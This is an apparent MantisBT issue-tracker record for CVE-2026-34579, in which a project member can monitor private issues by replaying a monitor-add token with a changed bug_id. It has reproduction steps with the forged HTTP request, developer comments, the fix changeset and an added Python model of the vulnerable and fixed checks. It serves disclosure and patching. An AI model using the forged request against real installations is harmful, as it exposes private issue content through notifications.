View Issue Details

ID: 0036975
Project: mantisbt
Category: security
View Status: public
Last Update: 2026-05-09 19:56
Reporter: ninjasec
Assigned To: dregad
Priority: normal
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 2.26.1
Target Version: 2.28.2
Fixed in Version: 2.28.2
Summary0036975: CVE-2026-34579: Authorization bypass in private issue monitoring allows unauthorized users to subscribe to restricted issues
Description

A user with project-level access, but without permission to view a private issue, can add themselves as a monitor for that issue by replaying a valid bug_monitor_add_token from another issue and modifying the submitted bug_id. The application accepts the request and creates a monitor relationship for the private issue.

Direct access to the private issue remains blocked in the web UI. However, once added as a monitor, the user may receive notifications for updates to that issue. Based on the recipient-building logic, this creates a credible path to disclosure of private issue metadata and content through email notifications.

Affected Components

  • bug_monitor_add.php
  • MonitorAddCommand.php:94
  • notification recipient handling in email_api.php:320

Root Cause

  • The monitor-add flow validates permission using access_has_project_level() rather than a bug-level visibility check. As a result, the action is authorized based on project membership and threshold alone, without enforcing access to the specific private issue. The private issue visibility gate present in access_api.php:527 is not applied in this path.

Steps To Reproduce

Prerequisites

  • authenticated user account with project access
  • at least one private issue the user is not permitted to view
  • at least one issue the same user is permitted to view, in order to obtain a valid bug_monitor_add_token

Additional Information

  1. Configure issue 1 as private and assign ownership to administrator.
  2. Log in as reporter.
  3. Confirm that reporter cannot access the private issue:

     GET /view.php?id=1 HTTP/1.1
     Host: 127.0.0.1:8082
     Cookie: MANTIS_STRING_COOKIE=...; PHPSESSID=...; MANTIS_secure_session=1

     Observed response:

     HTTP/1.1 403 Forbidden

  4. Open another issue visible to reporter, for example issue 3, and extract the monitor action token from the page:

     <form method="post" action="bug_monitor_add.php" class="form-inline">
       <fieldset>
         <input type="hidden" name="bug_monitor_add_token" value="20260316WZvW4rsIbiF4SP8NXfTLwbmyxN8Ji-0C">
         <input type="hidden" name="bug_id" value="3" />
       </fieldset>
     </form>

  5. Reuse that token in a forged request, changing bug_id from 3 to 1:

     POST /bug_monitor_add.php HTTP/1.1
     Host: 127.0.0.1:8082
     Cookie: MANTIS_STRING_COOKIE=...; PHPSESSID=...; MANTIS_secure_session=1
     Content-Type: application/x-www-form-urlencoded

     bug_monitor_add_token=20260316WZvW4rsIbiF4SP8NXfTLwbmyxN8Ji-0C&bug_id=1

     Observed response:

     HTTP/1.1 302 Found
     Location: http://127.0.0.1:8082/view.php?id=1

  6. Verify that the monitor record was inserted:

     select bug_id, user_id
     from mantis_bug_monitor_table
     where bug_id = 1;
Tags: No tags attached.

Relationships

related to 0033404 (closed, atrol): Unable to grant user access to private issue by adding them as a monitoring user

Activities

dregad (developer)   2026-03-28 13:59   ~0070912

The risk of information disclosure is confirmed.

The access check type was changed from bug to project in 2.26.1 by commit MantisBT master-2.26 2e1c8148, to fix a regression that prevented adding monitors to a private issue, see 0033404 and related PR https://github.com/mantisbt/mantisbt/pull/1953.

dregad (developer)   2026-03-29 05:13   ~0070913

Advisory https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v created and CVE request sent.

Proposed patch is available at https://github.com/mantisbt/mantisbt-ghsa-fvjf-68wh-rwp2/pull/1/commits/97d08f227db0e1d1c61950d27131bc989fa47e4b (note that the private repo is linked to another advisory; I did that to minimize effort as I'm working on several security issues from the same researcher in parallel).

@vboctor, @atrol you may want to review and test this patch to ensure it does not reintroduce the regression fixed in 0033404.

dregad (developer)   2026-03-31 03:03   ~0070920

CVE-2026-34579 assigned

Related Changesets

MantisBT: master-2.28 0a93267d

2026-03-28 14:16

dregad

Only let users monitor private issues they can access

Fixes an information disclosure vulnerability, which was introduced by
the fix for issue 0033404.

MonitorAddCommand now checks for monitor_bug_threshold differently,
depending on whether the user is adding themselves (bug-level check) or
someone else (project-level check).

Fixes 0036975
Affected Issues: 0033404, 0036975
mod - core/commands/MonitorAddCommand.php
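The root cause (authorization keyed on access_has_project_level() instead of a bug-level check) and the fix described in the changeset above (bug-level check when a user adds themselves, project-level check when adding someone else) can be modelled side by side. The following Python is an added example written for this page; it is not MantisBT code and does not reproduce MonitorAddCommand.php or access_api.php. The access-level, view-state and threshold constants mirror MantisBT's documented defaults; the Store, Bug, access_has_*, monitor_add_* and scenario helpers are constructed stand-ins, and the data mirrors the report's setup (issue 1 private and owned by the administrator, issue 3 public, one reporter-level user).

```python
"""Model of the monitor-add authorization decision in this report.

Constructed example: the data and helper functions stand in for MantisBT's
access_api / MonitorAddCommand and are NOT the project's code. Constants
mirror MantisBT's default configuration values.
"""
from dataclasses import dataclass, field

# Access levels and view states as defined in MantisBT's constants.
VIEWER, REPORTER, UPDATER, DEVELOPER, MANAGER, ADMINISTRATOR = 10, 25, 40, 55, 70, 90
VS_PUBLIC, VS_PRIVATE = 10, 50

# Default thresholds (config_defaults_inc.php).
MONITOR_BUG_THRESHOLD = REPORTER
MONITOR_ADD_OTHERS_BUG_THRESHOLD = DEVELOPER
PRIVATE_BUG_THRESHOLD = DEVELOPER


@dataclass
class Bug:
    id: int
    project_id: int
    reporter_id: int
    handler_id: int
    view_state: int


@dataclass
class Store:
    bugs: dict                                  # bug_id -> Bug
    project_access: dict                        # (project_id, user_id) -> level
    monitors: set = field(default_factory=set)  # (bug_id, user_id), like mantis_bug_monitor_table


def access_has_project_level(store, threshold, project_id, user_id):
    """Project-membership check only: the issue's view state is never consulted."""
    return store.project_access.get((project_id, user_id), 0) >= threshold


def access_has_bug_level(store, threshold, bug_id, user_id):
    """Project check plus the private-issue visibility gate (model, not access_api.php)."""
    bug = store.bugs[bug_id]
    level = store.project_access.get((bug.project_id, user_id), 0)
    is_private = bug.view_state == VS_PRIVATE
    is_party = user_id in (bug.reporter_id, bug.handler_id)
    if is_private and not is_party and level < PRIVATE_BUG_THRESHOLD:
        return False
    return level >= threshold


def monitor_add_vulnerable(store, actor_id, bug_id, target_id):
    """Pre-fix behaviour: a project-level check, so bug_id is never validated."""
    bug = store.bugs[bug_id]
    if not access_has_project_level(store, MONITOR_BUG_THRESHOLD, bug.project_id, actor_id):
        raise PermissionError("monitor_bug_threshold not met")
    store.monitors.add((bug_id, target_id))


def monitor_add_fixed(store, actor_id, bug_id, target_id):
    """Post-fix behaviour as the changeset describes it: bug-level check when the
    actor adds themselves, project-level check when adding someone else."""
    bug = store.bugs[bug_id]
    if actor_id == target_id:
        allowed = access_has_bug_level(store, MONITOR_BUG_THRESHOLD, bug_id, actor_id)
    else:
        allowed = access_has_project_level(
            store, MONITOR_ADD_OTHERS_BUG_THRESHOLD, bug.project_id, actor_id)
    if not allowed:
        raise PermissionError("access denied")
    store.monitors.add((bug_id, target_id))


def build_repro_store():
    """Constructed data mirroring the report's setup."""
    admin, reporter = 1, 2
    return Store(
        bugs={
            1: Bug(1, project_id=1, reporter_id=admin, handler_id=admin, view_state=VS_PRIVATE),
            3: Bug(3, project_id=1, reporter_id=reporter, handler_id=0, view_state=VS_PUBLIC),
        },
        project_access={(1, admin): ADMINISTRATOR, (1, reporter): REPORTER},
    )


def attempt(add, actor_id, bug_id, target_id):
    """Run one monitor-add against a fresh store; True if a monitor row was inserted."""
    store = build_repro_store()
    try:
        add(store, actor_id, bug_id, target_id)
    except PermissionError:
        return False
    return (bug_id, target_id) in store.monitors


def scenario(add):
    """Three outcomes: reporter self-adds to private issue 1 (the forged request),
    reporter self-adds to public issue 3 (legitimate use), and the administrator
    adds the reporter to issue 1 (the 0033404 use case that must keep working)."""
    admin, reporter = 1, 2
    return (
        attempt(add, reporter, 1, reporter),
        attempt(add, reporter, 3, reporter),
        attempt(add, admin, 1, reporter),
    )


if __name__ == "__main__":
    print("vulnerable:", scenario(monitor_add_vulnerable))  # (True, True, True)
    print("fixed:     ", scenario(monitor_add_fixed))       # (False, True, True)
```

The third outcome is the regression check dregad asks reviewers for: with the self/other split, an administrator can still add a monitor to a private issue, while a reporter-level user can no longer add themselves to one. The bug_monitor_add_token is deliberately absent from the model; as the reproduction shows, it is accepted across issues, so it is a form-replay protection and plays no part in the authorization decision.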